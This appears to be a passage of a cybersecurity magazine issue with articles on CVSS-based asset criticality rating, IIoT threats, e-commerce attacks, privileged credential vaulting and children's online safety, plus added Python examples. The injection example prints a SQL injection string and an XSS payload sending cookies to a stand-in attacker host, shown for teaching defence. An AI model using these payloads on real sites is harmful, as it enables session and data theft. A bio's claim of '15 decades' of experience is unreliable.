In this section we share details of how CVSS (the Common Vulnerability Scoring System) can be used to build the ACRR. CVSS is an open framework for communicating the characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental.

Our interest is in the Base metrics. The Base score represents the intrinsic qualities of a vulnerability that are constant over time and across user environments, and is composed of two sets of metrics, Exploitability metrics and Impact metrics, plus the Scope metric:

Exploitability Metrics | Impact Metrics | Scope
Attack Vector | Confidentiality Impact | Scope
Attack Complexity | Integrity Impact |
Privileges Required | Availability Impact |
User Interaction | |

For ACRR, we only need Impact Metrics, and we will then find an average Impact for Confidentiality, Integrity and Availability across all the key attributes required for generating ACRR.


ACRR Formula
The ACRR is based on the CVSS standard used for security vulnerability rating. We extend the same model to measure the criticality of an asset, using the following formula:

ACRR = f(Confidentiality, Integrity, Availability)

Ci = average weight of all the Confidentiality Impact values for the asset
Ii = average weight of all the Integrity Impact values for the asset
Ai = average weight of all the Availability Impact values for the asset
ISS = Impact Sub-Score

ISS = 1 - ((1 - Ci) * (1 - Ii) * (1 - Ai))
ACRR = roundup(min(ISS * 8, 10))

The min() function returns the lower of its two arguments, and roundup rounds up to zero decimal places. We derived the constant 8 by iterating over a number of assets until the rating scores were acceptable, following the Delphi method.

Mathematical Ranges
Ci = [0, 1], Ii = [0, 1], Ai = [0, 1]
ACRR = [0, 10.0]

One check worth making before adopting the constant: because Ci, Ii and Ai each lie in [0, 1], ISS also lies in [0, 1], so ISS * 8 never exceeds 8 and the min(..., 10) cap is never reached. With the constant 8 the highest attainable ACRR is therefore 8.0, which sits in the High band of the rating scale; an organization that wants the Critical band to be reachable must choose a larger constant (10, for example) when tuning it.


ACRR Rating Scale

All ACRR scores are mapped to a qualitative rating, in line with the industry-standard CVSS rating scale:

Rating | ACRR Score
None | 0.0
Low | 0.1 to 3.9
Medium | 4.0 to 6.9
High | 7.0 to 8.9
Critical | 9.0 to 10.0

ACRR Worksheet
We use the following key indicators in our worksheet to demonstrate how the ACRR is generated for a given asset.

Key Indicator | Description | Possible options
Sensitive Data Handling | The type of data the asset (application or server) is processing. | Personally Identifiable Information (PII), PCI Card Data (PCD), Personal Health Information (PHI), etc.
Application Exposure | The type of users and network the application is exposed to. | Public Internet, Partner Network, Internal Network
Service Tier | How critical a service is to the operation of the business from an availability point of view. | Tier-0, Tier-1, Tier-2 or Tier-3, where T0 is a critical service and T3 is non-essential
Sensitive Data Volume | Volume of data processed by the application or by the servers involved in that application. | Blocks of 100K or 10K records, based on business risk
Number of External Users | Number of active external users of the application; applies to all servers involved. | e.g. 1 million to 10 million
Development Model | Whether the application was developed by the internal development team, developed using an outsourcing model, or a mix. | Internally Developed, Externally Developed, Hybrid, 3rd Party Product
Hosting Environment | The asset hosting environment. | Public IaaS, PaaS or Kubernetes, SaaS, Private Data Center

Additional key indicators could be used based on risks and threats related to Hosting Environment, Number of Admin users etc.

In the next section we generate the ACRR for a given asset using the following key indicators, which help identify the impact. For each key indicator we assign a weighting for Confidentiality, Integrity and Availability. The weighting is assigned based on the risk or impact that would be caused if the asset involved were compromised. The weighting must be between 0 and 1: a lower weight for low impact and a higher weight for high impact.

Key Indicator | Indicator Value | Confidentiality Impact | Integrity Impact | Availability Impact
Sensitive Data Handling | PCD & PII | 0.7 | 0.7 | Not applicable
Application Exposure | Public Internet | Not applicable | Not applicable | 0.9
Service Tier | Tier-0 | Not applicable | Not applicable | 0.9
Sensitive Data Volume | 1 million – 5 million | 0.8 | 0.8 | Not applicable
Number of External Users | 100k – 1 million | Not applicable | Not applicable | 0.7
Development Model | Internally Developed | 0.2 | 0.2 | Not applicable
Hosting Model | Public IaaS | 0.6 | 0.6 | Not applicable

In essence, ACRR determines the impact the business is going to suffer if the asset in question were to be compromised.

Ci = (0.7 + 0.8 + 0.2 + 0.6) / 4 = 2.3 / 4 = 0.575 ≈ 0.6

Ii = (0.7 + 0.8 + 0.2 + 0.6) / 4 = 2.3 / 4 = 0.575 ≈ 0.6

Ai = (0.9 + 0.9 + 0.7) / 3 = 2.5 / 3 = 0.833 ≈ 0.8

Ci, Ii and Ai are rounded to one decimal place.

ISS = 1 - ((1 - 0.6) * (1 - 0.6) * (1 - 0.8)) = 1 - (0.4 * 0.4 * 0.2) = 1 - 0.032 = 0.968
ACRR = roundup(min(0.968 * 8, 10)) = roundup(min(7.744, 10)) = roundup(7.744) = 8

An ACRR of 8 falls in the 7.0 to 8.9 band, so the Asset Criticality Risk Rating is High.
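The worksheet and formula above are straightforward to automate, which is the article's first requirement for the ACRR (no user input in the loop). What follows is an added example, not the author's implementation: it encodes the worksheet rows and weights exactly as the article gives them, computes Ci, Ii, Ai, ISS and the ACRR with the stated rounding rules, maps the score to the rating scale, and adds one check the article does not show, the highest score the formula can reach for a given constant. Row and column names are this example's own.

```python
"""Asset Criticality Risk Rating (ACRR) as the article defines it:
    ISS  = 1 - (1 - Ci) * (1 - Ii) * (1 - Ai)
    ACRR = roundup(min(ISS * 8, 10))
Added example that reproduces the worksheet above; the indicator values and
weights are the article's, the code and its checks are not the author's."""
import math
from typing import List, Optional, Tuple

# One row per worksheet indicator: (indicator, value, C, I, A); None = not applicable.
Row = Tuple[str, str, Optional[float], Optional[float], Optional[float]]

WORKSHEET: List[Row] = [
    ("Sensitive Data Handling", "PCD & PII", 0.7, 0.7, None),
    ("Application Exposure", "Public Internet", None, None, 0.9),
    ("Service Tier", "Tier-0", None, None, 0.9),
    ("Sensitive Data Volume", "1 million - 5 million", 0.8, 0.8, None),
    ("Number of External Users", "100k - 1 million", None, None, 0.7),
    ("Development Model", "Internally Developed", 0.2, 0.2, None),
    ("Hosting Model", "Public IaaS", 0.6, 0.6, None),
]

# Qualitative bands from the ACRR rating scale (same as CVSS v3).
SCALE = [(0.0, 0.0, "None"), (0.1, 3.9, "Low"), (4.0, 6.9, "Medium"),
         (7.0, 8.9, "High"), (9.0, 10.0, "Critical")]
CONSTANT = 8.0  # the article's Delphi-derived multiplier


def mean_weight(rows: List[Row], column: int) -> float:
    """Average of the applicable weights in a column, rounded to one decimal as the article does."""
    values = [r[column] for r in rows if r[column] is not None]
    if any(not 0.0 <= v <= 1.0 for v in values):
        raise ValueError("weights must lie in [0, 1]")
    if not values:
        return 0.0  # no indicator touches this dimension
    return round(sum(values) / len(values), 1)


def impact_subscore(ci: float, ii: float, ai: float) -> float:
    return 1.0 - (1.0 - ci) * (1.0 - ii) * (1.0 - ai)


def roundup(x: float, decimals: int = 0) -> float:
    """Round up to the given number of decimal places (the article uses zero)."""
    factor = 10 ** decimals
    return math.ceil(round(x * factor, 9)) / factor


def acrr(rows: List[Row], constant: float = CONSTANT) -> Tuple[float, float, float, float, float]:
    """Return (Ci, Ii, Ai, ISS, ACRR) for a worksheet."""
    ci, ii, ai = mean_weight(rows, 2), mean_weight(rows, 3), mean_weight(rows, 4)
    iss = impact_subscore(ci, ii, ai)
    return ci, ii, ai, iss, roundup(min(iss * constant, 10.0))


def rating(score: float) -> str:
    for low, high, name in SCALE:
        if low <= score <= high:
            return name
    raise ValueError(f"score {score} outside 0..10")


def max_attainable(constant: float = CONSTANT) -> float:
    """Ceiling of the scale: all weights at 1.0 give ISS = 1, so ACRR = min(constant, 10)."""
    return acrr([("all", "max", 1.0, 1.0, 1.0)], constant)[4]


if __name__ == "__main__":
    ci, ii, ai, iss, score = acrr(WORKSHEET)
    print(f"Ci={ci} Ii={ii} Ai={ai} ISS={iss:.3f} ACRR={score} ({rating(score)})")
    print(f"highest ACRR reachable with constant {CONSTANT}: {max_attainable()}")
```

Running it reproduces the article's figures (Ci = Ii = 0.6, Ai = 0.8, ISS = 0.968, ACRR = 8, High). The max_attainable() check shows that with the constant 8 the Critical band of the scale is unreachable; passing 10 as the constant makes the full 0 to 10 range available, which is the kind of tuning decision the risk analyst should make deliberately rather than discover after the fact.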

Enhancing Cybersecurity Risk
The goal of the asset management solution is to provide the asset attributes, or key indicators, collected by agent and/or network based scans on a consistent basis. The ACRR data does not change often, but it is critical input for cybersecurity risk.

Inherent Risk: As we know, there are no perfect assets or applications. Any application or server will on average have 40 to 75 known issues, including vulnerabilities from network and infrastructure, open-source libraries, and application security findings from SAST, DAST and so on. The inherent risk depends heavily on the static risk, i.e. the ACRR, so it is very important to get the ACRR right, consistently and through automation. Inherent risk can also be derived using CVSS methodologies; the challenge is averaging the exploitability and impact across all the known vulnerabilities. Inherent risk must be calculated on a daily basis, and only a good automation mechanism with asset management and vulnerability correlation can provide this data.

Residual Risk: Residual risk is what CISOs are looking for to get an idea of how effective their cybersecurity investment has been and how well they are protecting against the known issues that cannot be fixed due to various limitations. Residual risk is the risk score after taking into consideration all the security countermeasures and exploit prevention solutions in place. Residual risk is the real threat and risk to the enterprise.


About the Author

Gyan Prakash is Head of Information Security at Altimetrik. Before joining Altimetrik, Gyan was Global Head of Application Security & Security Engineering at Visa from 2016 to 2020, where he managed product security architecture and engineering, application security and vulnerability management. Gyan also led Future of Payment and Blockchain / Cryptocurrency research at Visa from 2014 to 2016. Gyan has 20+ years of experience in security technologies. He implemented mature DevSecOps at Visa and has been consulting with Fortune 500 organizations working to implement DevSecOps at scale. Gyan is a technologist and innovator at heart, with 250 global patents, including 152 granted, in the areas of system security, mobile security, tokenization, and blockchain. LinkedIn: https://www.linkedin.com/in/gyan-prakash-747a8a2/ Altimetrik Corp: https://www.altimetrik.com/


The Rising Tide of Security Threats in The Industrial Internet of Things By Don Schleede, Information Security Officer at Digi International

Throughout Cyber Security Awareness Month in October, many organizations shared their thoughts on the state of cybersecurity and reflected on the processes and steps that can improve it. However, the discussion largely focused on protecting end users rather than building security into networks and devices from a systemic perspective. Through its theme of "If You Connect It, Protect It," Cybersecurity Awareness Month has also opened the door to conversations about IoT cybersecurity.

Most IoT discussions focus on consumer IoT – the smart trend-of-the-moment. That’s not surprising since consumer-centric applications and devices are increasingly visible in everyday life and provide that “living in the future” feeling that grabs attention. However, industrial and enterprise IoT applications have just as many implications – though perhaps slightly less visibly, which means they receive far less attention and are less understood. It’s easier to assume that industrial IoT is more secure than its consumer counterparts, since those applications are backed by large organizations facing greater security risks. However, that’s a mistaken notion: The industrial IoT’s struggle with security remains a challenge that is largely unaddressed.


Understanding the Industrial IoT

When we talk about IoT, we tend to think of devices and connected “things” – smart TVs, home security systems, self-driving cars, to name a few. We rarely consider the resources these “things” rely on or the networks that connect them. Yet these systems are underpinned by hundreds – perhaps thousands – of connected devices that, when compromised, can have far-reaching consequences.

To talk about industrial IoT security, we must first understand the types of disruptive security threats:

• Confidentiality threats – These intrusions expose sensitive or confidential information, including the viewing of data in the actual device or the theft/cloning of the device firmware itself.
• Theft of service – Authentication weaknesses or failures create critical vulnerabilities. Upgrade features unlocked without authorization are also an important threat.
• Data integrity threats – Unauthorized messages are introduced into a network, or an unauthorized party takes control of a device.
• Availability threats – Denial-of-service (DoS) attacks prevent the device from sending messages by flooding it with hostile traffic.

All of these disruptions can arise through different methods, from reverse engineering, micro-probing a chip, or exploiting unintentional security vulnerabilities in code, to exploiting weaknesses in internet protocols or in cryptography and key handling. No matter the source, one thing is clear: we need to know where to improve security and how to close those gaps.

Building security from the ground up

Our analysis of active devices found that 43% of IIoT devices communicate insecurely. That’s certainly far better than consumer IoT devices (98% of which are unsecured), but the reality is that the number is still far too high, and the potential repercussions of these lax protocols are serious. From manufacturing, transportation, and utilities to healthcare and other industries, organizations must adopt key strategies to prevent and mitigate security issues:

• Security-by-Design: Vendors and customers repeatedly choose lower costs and faster go-to-market options instead of investing the necessary time and effort to design and build top-level security into their devices and applications. As vulnerabilities and attacks continue, organizations are, at last, beginning to factor in the risks (think: liabilities and compliance issues) caused by faulty security settings and inadequate encryption/privacy protection. Security is also gaining importance over the long run because it reduces the costs of potential breaches.
• Device Authentication and Identity: Passwords remain one of the most common forms of authentication, and one of the most common ways threat actors penetrate systems. Many organizations are opting for multi-factor authentication (MFA), which adds a second layer of access protection by requiring additional forms of authentication. From location-based options such as an IP address to something the user physically possesses like a phone or a key fob, MFA offers flexible controls for easier management and a smoother and faster user experience, while improving overall security even for physically dispersed devices.


• Updates and Upgrades: IIoT devices have much longer lifetimes than consumer IoT devices, as much as 10 to 15 years. Updating and upgrading the firmware and software for each device becomes increasingly challenging as the volume of devices in the field rises. An organization cannot just deploy thousands of devices; it must manage them throughout that lengthy lifecycle. IIoT leaders can offer centralized device management solutions to help administrators manage updates and patches, troubleshoot through out-of-band management, reconfigure devices, and monitor the health of the entire network. This holistic approach provides insight when a specific device is at risk and helps them mitigate issues before they worsen.
• Risk Assessments and IoT Regulations: As we move into 2021, the number of IIoT devices will continue to grow, requiring organizations to assess both devices and networks. For security professionals, this is already a best practice for all deployments. However, soon it will be the standard thanks to guidelines within NIST's IoT security framework, legislative and industry regulations, and other mandates. This is a move in the right direction and a long-overdue step, since large swaths of the IoT remain vulnerable today.

Awareness, Understanding, and Action

Embedded security is a critical requirement for a growing number of connected IoT applications and devices, especially as threats continue to rise. Although we continue to play catch-up with threat actors, we are seeing a gradual shift in the right direction. More leaders understand the need to improve security, and new regulations have identified and highlighted a problem that has been lurking for years. It is time for IoT vendors, developers, admins, and engineers to make security a top priority.

About the Author

Don Schleede is the Information Security Officer for Digi International, a Minnesota-based manufacturer of embedded systems, as well as routers, gateways, and other communications devices for the Industrial IoT. He has 27 years of experience in high-tech security and has been with Digi for more than seven years. Earlier, Don held positions as a developer, IT Operations Director, and IT Architect.


E-Merchants: Secure Your Online Sales from Cybersecurity Threats By Anthony Webb, EMEA Vice President, A10 Networks

This year, online retailers pushed the boundaries with "Black Friday" deals in the hope of improving their online sales, as uncertainty around in-store shopping due to COVID-19 led many customers to make their purchases from the safety of their own homes. As a result, e-commerce merchants have seen a significantly larger number of users and devices connecting to their websites than in recent years.

Good Cybersecurity is Crucial

The good news for e-tailers is that overall sales are expected to grow in the new year. This has added importance in a year when many e-commerce businesses have faced unprecedented disruption. However, one thing is clear. Online sales will take centre stage.


However, just as online sales are at the forefront, so should cybersecurity. Retailers aren’t the only ones looking to capitalise on the increase in online spending. Shopping seasons offer hackers an opportunity to profit as well. We’ve already seen a huge uptick in cyber-threats due to COVID-19. Now, online shopping provides cyber-criminals with additional motivation to launch their attacks using some of the below tactics:

Phishing – Phishing and its variants, including spear-phishing and whaling, are email-based attacks that leverage social engineering techniques to fool recipients into providing sensitive information to the attacker. While spear-phishing and whaling attacks are more targeted than phishing, all three forms attempt to get the victim to read the email, click on a link, possibly open an attachment, and ultimately disclose valuable personal or corporate information.
Ransomware – Ransomware attacks, which seek to extort money from victims by encrypting files or entire systems until the victim pays the attacker a ransom, have become increasingly popular in recent years. Much of this has to do with the potential to make large sums of money from the ransoms. Another reason for the rise in ransomware attacks is the availability of ransomware-as-a-service (RaaS) kits, which are inexpensive to purchase on the black market, making it easy for novice hackers to launch their own attacks. Phishing emails are the top threat vector for distributing ransomware.
Distributed Denial of Service (DDoS) – DDoS attacks are designed to stop a computer, server, website, or service from operating by flooding it with internet traffic generated by an army of bots called a botnet. The tremendous growth in Internet of Things (IoT) devices, many of which are not properly secured, has made it easier for attackers to take control of more devices and create botnets. DDoS attacks can be especially damaging to e-commerce businesses if customers can't access their websites to make purchases.
Malware – Malware attacks take many forms including viruses, worms, spam, spyware and more. Some malware threats such as spam are more of an annoyance, while others such as viruses and worms can spread across a network, infecting systems and negatively impacting their performance and user productivity. Similarly, spyware can slow down systems. However, it can also be used to report sensitive information such as passwords back to the hacker.
Injections – Injection attacks such as cross-site scripting and SQL injection are used to exploit vulnerabilities in web applications by injecting malicious code into a program, which then interprets the code and changes the program's execution. In other words, it gets the application to do something unintended, such as altering the behavior of a website or exposing confidential data like login credentials to the attacker. E-commerce businesses hit with an injection attack could find their customers redirected to a fake site which illegally harvests customer information.
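The injection item above describes the mechanism in prose: user input ends up being interpreted as code. The following is an added example, not the author's or A10's code, showing both cases named in that paragraph on a constructed customer table: a SQL lookup that concatenates the input (the attacker's quote characters become part of the query and every row comes back) beside the parameterised version that treats the same input as a plain value, and a review snippet rendered with and without HTML escaping for the cross-site scripting case. Table, rows, function names and attacker inputs are all constructed for illustration.

```python
"""Injection on an e-commerce lookup: the string-built query beside its
parameterised replacement, and reflected output beside its escaped form.
Added example, not the author's code; the table, rows and attacker inputs
are constructed."""
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for a shop's customer table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO customers (email, password_hash) VALUES (?, ?)",
                     [("alice@example.com", "hash-a"), ("bob@example.com", "hash-b")])
    return conn


def find_customer_vulnerable(conn: sqlite3.Connection, email: str) -> list:
    # Untrusted input is concatenated into the SQL text, so the attacker's
    # quote characters are parsed as part of the query.
    sql = f"SELECT email FROM customers WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def find_customer_safe(conn: sqlite3.Connection, email: str) -> list:
    # Parameterised query: the value travels separately from the SQL text
    # and is never interpreted as SQL, whatever characters it contains.
    return [row[0] for row in conn.execute(
        "SELECT email FROM customers WHERE email = ?", (email,))]


def review_html_vulnerable(review: str) -> str:
    # Reflecting user text straight into markup is the cross-site scripting case.
    return f"<p class='review'>{review}</p>"


def review_html_safe(review: str) -> str:
    # Escape for the HTML text context before rendering.
    return f"<p class='review'>{html.escape(review)}</p>"


SQLI_INPUT = "' OR '1'='1"   # classic tautology: WHERE email = '' OR '1'='1'
XSS_INPUT = "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable lookup:", find_customer_vulnerable(db, SQLI_INPUT))  # every customer
    print("safe lookup:      ", find_customer_safe(db, SQLI_INPUT))        # no match
    print(review_html_vulnerable(XSS_INPUT))
    print(review_html_safe(XSS_INPUT))
```

A WAF in front of the site, as the article recommends later, can block the obvious payloads, but the durable fix is the parameterised query and context-appropriate output encoding in the application itself; the WAF is a second layer, not a replacement.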

The Consequences of Poor Cybersecurity

If e-commerce merchants are not prepared to stop malware, DDoS attacks, and other threats, the consequences of a successful attack could be the difference between surviving and ceasing trading. Here's what businesses could be facing:
Lost Revenue – Any downtime to a web server that prevents customers from making a purchase is damaging to online sales and can potentially have a severe impact, especially for smaller organisations.
Data Theft – The increase in online shopping during sales periods is a lure for cybercriminals to launch attacks aimed at stealing corporate and customer data. Phishing emails claiming to have information on fake shopping receipts, shipping status, and customer surveys are very popular in the run-up to Christmas.
Disruption of Services – DDoS and ransomware attacks can target services that we deem essential. E-commerce sites, public utilities, and schools are just a few examples of their victims. Shutting down access to a service, even for a short period of time, can have major financial and social impacts.


Damaged Reputation – Damage can extend beyond short-term financial losses and data theft. Consumer confidence and brand reputation can quickly erode when consumers have a poor online experience. Customers aren’t shy about using social media to express their displeasure.

Reduced Productivity – It’s not just customers who feel the impact of a successful attack. If employees can’t access the applications they need to do their jobs, expect to see a drop in productivity with an accompanying rise in undesirable workarounds.

Steps to Take

Cybersecurity is an everyday concern. Fortunately, there are some things that organisations can do to keep applications, networks, and the business safe from threats, especially during peak online shopping periods.

First, look for a solution that provides DDoS detection and mitigation to ensure services are continually available to legitimate users. Hackers have learned how to weaponise IoT devices to launch complex multi-vector and volumetric attacks, capable of bringing down application servers and entire networks.

Second, protect web-based applications with web application firewall (WAF) technology. Outdated applications are especially vulnerable to attack. A WAF will protect them from hackers looking to exploit HTTP and web application flaws.

Third, find solutions that meet current and future platform needs. Organisations may not have transitioned to the cloud yet, but they’ll likely have some cloud-based apps. They must be sure their solution is ready when the company is ready, whether it is moving to a hybrid cloud or multi-cloud infrastructure.

And finally, continue to educate employees on the need for good cyber hygiene. According to a 2019 IBM study, 95% of cybersecurity breaches are caused by human error.

With this shift to online a potentially permanent one, e-commerce merchants should expect these sustained levels of activity going forward. Therefore, it’s imperative that e-commerce businesses secure applications, servers, and networks from cyber threats at all times.

About the Author

As VP EMEA, Anthony Webb is responsible for managing and growing A10’s sales operations, as well as leading the company’s sales and channel strategy across the region. Before joining A10, he served as vice president EMEA of Ixia Technologies, focusing on maintaining Ixia’s position as the leading provider in network testing while driving their leadership status in network visibility. Prior to joining Ixia, he held positions at the vice president and managing director level for Juniper Networks, running sales organizations across EMEA and in the UK. In 2000, he joined Cisco as sales manager for service provider and enterprise verticals in the UK, before serving as enterprise sales director emerging markets with Cisco in MEA, then collaboration sales director emerging markets. He left Cisco in 2011 to return to the UK. Anthony can be reached online at ([email protected]) and at our company website https://www.a10networks.com/


The Privileged Credential Security Advantage
By Tony Goulding, Cybersecurity Evangelist at Centrify

Over time, one cause has emerged that accounts for the majority of enterprise security risk: privileged accounts lead to data breaches. So much so that the majority of breaches (over 67 percent) in 2020 were caused by credential theft.

Organizations that prioritize privileged credential security have an advantage over their peers by ensuring their operations are more resilient to data breaches. However, there’s a gap that continues to widen between those guarded against a breach and the numerous others that aren’t.

Many have paid attention and embraced the warnings and guidance from analysts, press, and vendors that called for implementing privileged access management (PAM) security controls to mitigate the risk. The question is, did you go far enough?


IT Automation Software and the Attack Surface

As it relates to privileged accounts, the attack surface can be enormous and very diverse. Reducing this attack surface is a primary objective. However, for many organizations, the first – and often, only – focus is on the human administrator and their privileged activities.

Let’s visit another slice of this attack surface that often flies under the radar. Your mileage may vary, but this risk can be just as significant, if not more so. It’s the use of privileged accounts by IT automation software; tools commonly found in IT service management (ITSM), IT operations management (ITOM), and continuous configuration and automation (CCA) platforms, such as asset discovery, vulnerability scanning, and software orchestration.

For example, you may use one tool to scan the network for systems and analyze each one looking for exploits, vulnerabilities, and misconfigurations. And another tool may help you maintain a single system of record for your IT assets by conducting an inventory of each system, feeding results into different tools to show applications, infrastructure, as well as service relationships and dependencies. On top of these, a different tool from a different vendor may be helping you control your IT infrastructure, job scheduling, and inventory management. Like the others, it needs administrative access to IT infrastructure.

What they have in common is that they all need to log into IT systems via SSH or WinRM to run commands and scripts with privileges and obtain system-level intelligence.

Therein lies the risk.

Externalizing Credential Management

By default, IT configures these privileged account IDs and passwords statically within the tool. Let’s be clear about what this means. You’re entrusting the keys to every IT system, on-premises and perhaps in the cloud as well, to an application whose core strength is not identity and credential management. Not only that, IT must manually configure dozens or even hundreds of credentials in the tool. Multiply that by the number of tools requiring privileged accounts, and the lights never go off for IT. We haven’t even got to password rotation.

Thankfully, several leading vendors in the space have recognized this. As an alternative, most allow IT to externalize identity and credential management to a third-party solution designed for the job. Relocating credentials to a hardened password vault is the best practice to mitigate this risk. Instead of IT configuring passwords within the tool, the tool fetches them from the vault at scan time. If an attacker compromises the tool, they won’t find any privileged account passwords in its configuration settings, preventing lateral movement to the IT servers and limiting what could amount to a complete compromise of every server in your IT infrastructure, including domain controllers.

Reducing Risk and Adding Value

The value doesn’t end there, however. By now, it’s evident that passwords are inherently weak and introduce risk. IT can use the vault to strengthen passwords and help prevent login denials. Frequent rotation helps mitigate the risk, along with setting long, cryptic passwords. Unfortunately, this falls below the line of high priorities for many IT shops, resulting in a “set it and forget it” mentality. With the vault, you get automatic account password rotation coupled with password quality-of-service policies. You avoid the risk of stale passwords with low entropy. No longer must IT manually log into each system to change the local account password, then manually update it in each tool to ensure consistency.

The vault can also help prevent scan failures that occur between scheduled password rotation jobs. Let’s say someone (a well-meaning internal admin or a threat actor) changes a local system password, but an ITOM tool is still using the old one. The login would then fail, and you now have gaps in system coverage requiring manual intervention. Some password vaults can automatically reconcile out-of-sync passwords in real time during password check-out to ensure the local system account password and the vaulted password are the same. This client-based password reconciliation feature ensures that your tool will always fetch a valid password from the vault with which to log in at scan time.
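The externalized-credential pattern from the previous section, together with the check-out-time reconciliation just described, as an added example that is not Centrify's code or any vendor's API: a stand-in scanner whose configuration names target accounts but holds no passwords, and a stand-in vault that rotates passwords on demand, detects a password that was changed behind its back, and reconciles it before handing it to the tool. The target systems, the vault, the reconciliation credential and the 24-character policy are all assumptions for the example.

```python
"""Added example (not Centrify's or any ITOM vendor's code): an IT automation
scanner that keeps no passwords in its own configuration and instead checks
them out of a vault at scan time; the vault rotates passwords on a schedule
and reconciles a password that drifted out of sync before handing it over.
All classes are constructed stand-ins."""
import secrets
import string
from dataclasses import dataclass, field
from typing import Dict, List

PASSWORD_LEN = 24                                   # assumed quality policy: long and random
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length: int = PASSWORD_LEN) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


class TargetSystem:
    """Stand-in for a managed server's local privileged account."""

    def __init__(self, name: str, password: str):
        self.name = name
        self._password = password

    def login(self, password: str) -> bool:
        return secrets.compare_digest(password, self._password)

    def force_reset(self, new_password: str) -> None:
        # Assumption: the vault holds a separate reconciliation credential that
        # is allowed to reset local account passwords without knowing the old one.
        self._password = new_password


@dataclass
class Vault:
    """The only place privileged passwords live. Every hand-out is audited."""
    systems: Dict[str, TargetSystem] = field(default_factory=dict)
    store: Dict[str, str] = field(default_factory=dict)
    audit: List[str] = field(default_factory=list)

    def onboard(self, system: TargetSystem, current_password: str) -> None:
        self.systems[system.name] = system
        self.store[system.name] = current_password

    def rotate(self, name: str) -> None:
        """Scheduled rotation: reset the target, then vault the new value."""
        new = generate_password()
        self.systems[name].force_reset(new)
        self.store[name] = new
        self.audit.append(f"rotated {name}")

    def check_out(self, name: str) -> str:
        """Hand a tool a password that is known to work. If someone changed the
        password on the box behind the vault's back, reconcile first."""
        if not self.systems[name].login(self.store[name]):
            self.rotate(name)
            self.audit.append(f"reconciled {name}")
        self.audit.append(f"checked out {name}")
        return self.store[name]


class ScannerTool:
    """Stand-in ITOM scanner: its config names accounts but holds no secrets."""

    def __init__(self, vault: Vault, targets: List[str]):
        self.vault = vault
        self.config = {"targets": list(targets), "credential_source": "vault"}

    def scan(self) -> Dict[str, bool]:
        """Log in to every target with a freshly checked-out password."""
        results = {}
        for name in self.config["targets"]:
            password = self.vault.check_out(name)
            results[name] = self.vault.systems[name].login(password)
        return results


def config_leaks_secret(tool: ScannerTool) -> bool:
    """Compromised-tool check: does the tool's config contain any vaulted password?"""
    blob = repr(tool.config)
    return any(pw in blob for pw in tool.vault.store.values())


def demo() -> dict:
    vault = Vault()
    for name in ("web01", "db01"):
        vault.onboard(TargetSystem(name, "initial-Passw0rd!"), "initial-Passw0rd!")
        vault.rotate(name)
    # Constructed drift: an admin (or an intruder) resets db01 outside the vault.
    vault.systems["db01"].force_reset("changed-out-of-band")
    tool = ScannerTool(vault, ["web01", "db01"])
    return {"scan": tool.scan(), "leak": config_leaks_secret(tool),
            "reconciled": "reconciled db01" in vault.audit,
            "audit": list(vault.audit)}
```

`demo()` shows the scan succeeding on both hosts even though db01 drifted, with the audit trail recording the reconciliation; `config_leaks_secret` is the check to run against any automation tool's saved configuration.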

Because unauthorized access is a high-reward, low-risk endeavor, hackers will continue to seek out and find new ways of gaining access to high-value and sensitive resources. But embracing a defense-in-depth strategy by externalizing credential management and gaining insight into incremental risk can go a long way toward mitigating or preventing data breaches, even if the specific attack vectors are not yet known.

About the Author

Tony is a Cybersecurity Evangelist at Centrify. He has over 30 years of security software experience and more than 15 decades of experience in identity and access management & privileged access management. Tony can be reached online on Twitter at @Tony_Centrify and at our company website www.centrify.com


How To Keep Your Children Safe In Remote Learning Situations
By Nevin Markwart, Chief Information Security Officer at FutureVault

As parents, we have conflicting feelings on remote learning. On one hand, we want our children to stay healthy, especially in the midst of a public health crisis. On the other hand, online education opens the door to new threats—including opportunities for hackers, risks to our children’s privacy, and increased online harassment.

Fortunately, we as parents can play a proactive role in ensuring that our children’s online education is a safe and fulfilling experience. Here are several easy steps that you can take to protect your children in remote learning situations:

Classroom Learning

Creating an open dialogue with your children’s educators is a simple yet effective way to ensure that everyone is on the same page when it comes to safety and privacy. You should discuss safety protocols with the school and flag anything that concerns you. Confirm the school has privacy policies in place and learn what they are.

Speak with your children’s teachers and meeting administrators about which screenshare tool they use and confirm that only the school can control screensharing. Learn that program and its security features as well as you can.

Make sure the teacher allows students to turn off their cameras after confirming attendance if they’re uncomfortable “going live.” Many adults feel uncomfortable on camera, so imagine how children must feel.

Privacy

Parents should have ultimate control over what their children use and see online. Know what platforms your children are using, whether for learning or social media. Maintain direct oversight on whom your children engage with online and limit that circle to known friends, family, and acquaintances. Use Screen Time or Parental Controls to restrict the types of online activities your children can do.

You should set up secure passwords for your children to prevent their accounts from getting hacked. Secure passwords are at least twelve characters long, do not include dictionary words, and mix numbers, symbols, and letters (lowercase and uppercase). Turn on your firewall and make sure your children only download files from people or sites you know and trust.
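A checker for the password rules just stated (at least twelve characters, no dictionary words, a mix of digits, symbols and upper- and lowercase letters), as an added example that is not from the article. The six-word dictionary is a constructed stand-in for a real word list; a real check would load a large one.

```python
"""Added example (not from the article): check a candidate password against
the rules the article gives. DICTIONARY is a tiny constructed stand-in."""
import string

MIN_LENGTH = 12
DICTIONARY = ("password", "school", "hockey", "welcome", "summer", "qwerty")


def password_problems(password: str, dictionary=DICTIONARY) -> list:
    """Return the rules a password breaks; an empty list means it passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    classes = {
        "lowercase": any(c in string.ascii_lowercase for c in password),
        "uppercase": any(c in string.ascii_uppercase for c in password),
        "digit": any(c in string.digits for c in password),
        "symbol": any(c in string.punctuation for c in password),
    }
    for name, present in classes.items():
        if not present:
            problems.append(f"no {name} character")
    # A dictionary word hidden inside a longer string, in any letter case,
    # still weakens the password, so search the lowercased value.
    lowered = password.lower()
    for word in dictionary:
        if len(word) >= 4 and word in lowered:
            problems.append(f"contains dictionary word {word!r}")
    return problems


def is_secure(password: str) -> bool:
    return not password_problems(password)
```

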